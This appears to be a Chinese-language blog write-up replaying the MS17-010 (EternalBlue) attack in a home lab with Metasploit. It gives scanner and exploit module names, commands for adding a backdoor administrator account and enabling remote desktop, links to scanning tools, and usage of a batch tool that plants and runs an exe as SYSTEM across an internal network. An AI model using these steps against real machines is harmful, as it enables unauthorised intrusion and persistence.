事情起因#
雖然距離上一次 WannaCry 席捲全球 (17-05-12) 已經過去一年多了,現在來複現有炒冷飯的嫌疑,但是還是有價值的
參考文章:
環境準備#
- Kali:192.168.2.6
- Win7_SP1:192.168.2.7:默認為 Administrator 帳戶無密碼
- WinXP_SP3:192.168.2.4
使用 metasploit#
搜索模組#
使用 metasploit 來進行掃描和攻擊,我們先看一下關於 ms17_010 的模組有哪些:
掃描模組用
auxiliary/admin/smb/ms17_010_command
或者使用這個
auxiliary/scanner/smb/smb_ms17_010
攻擊模組我們使用exploit/windows/smb/ms17_010_eternalblue
使用掃描模組進行掃描#
auxiliary/admin/smb/ms17_010_command
可以看到 winxp 掃描成功了,win7 沒有掃描到,我們換另一個掃描模組:
auxiliary/scanner/smb/smb_ms17_010
可以看到這個模組兩個靶機它都認為可以攻擊
使用攻擊模組進行攻擊#
exploit/windows/smb/ms17_010_eternalblue
開了防火牆的情況下是攻擊不了的,關掉就可以攻擊了。
對靶機進行控制#
此處補充一下哪下 shell 中文顯示亂碼的問題:
輸入chcp 65001
即可
創建用戶並添加到管理員組#
net user soapffz adminpasswd /add
net localgroup administrators soapffz /add
開啟遠程桌面功能#
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
關閉時使用如下語句:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f
遠程桌面連接#
如果你的電腦是登陸了其他帳戶的話,這個遠程桌面窗口會一直等待 20 秒左右,這邊沒有反應的話就會把管理員帳戶擠下去,就進桌面了:
Windows 下的檢測 && 攻擊工具#
EternalBlues 批量檢測工具#
下載連接:http://omerez.com/repository/EternalBlues.exe
可以批量檢測當前電腦所在局域網內的主機是否存在 ms17_010 漏洞 (速度較快):
MS_17_010_Scanv2.1 檢測工具#
下載鏈接:https://www.lanzous.com/i359xch
速度較慢:
cping 批量檢測工具 (19-02-23 更新)#
介紹及使用參考文章:內網 - 掃描存活主機
k8 加強版 zzz 攻擊工具 (19-02-23 更新)#
內網批量 MS17-010 溢出工具,出自 k8 團隊:https://www.cnblogs.com/k8gege/p/10391101.html
以下教程搬運自 k8:
工具:k8加強版zzz
編譯:python
漏洞:MS17-010
用法:
zzz_exploit.exe 192.11.22.82
zzz_exploit.exe 192.11.22.82 exe參數
zzz_exploit.exe 192.11.22.82 exe參數 管道名
如exe啟動參數為 m.exe -Start 實戰命令為 zzz_exploit.exe 192.11.22.82 -Start
內網批量
可結合cping批量溢出內網,將名稱改為smbcheck即可,但exe必須使用無參版。(其它工具也可以,提供個IP參數即可)
因為cping只會傳IP進去,不會傳其它參數。使用前需將任意exe改名為ma.dat
溢出成功會自動將exe傳入目標機器,並以system權限啟動exe程序。
我們先試一下不帶 exe 程序執行的效果:
然後我們把一個經典的 IP 雷達工具按照教程所示改名為 ma.dat 放到文件夾中:
然後再試一下:
可以看到上傳我們的 IP 雷達 exe 到了C:\WINDOWS\Temp\msupdate.exe
,但是我們這不是一個馬子所以啟動服務失敗了:
大概用法就是這樣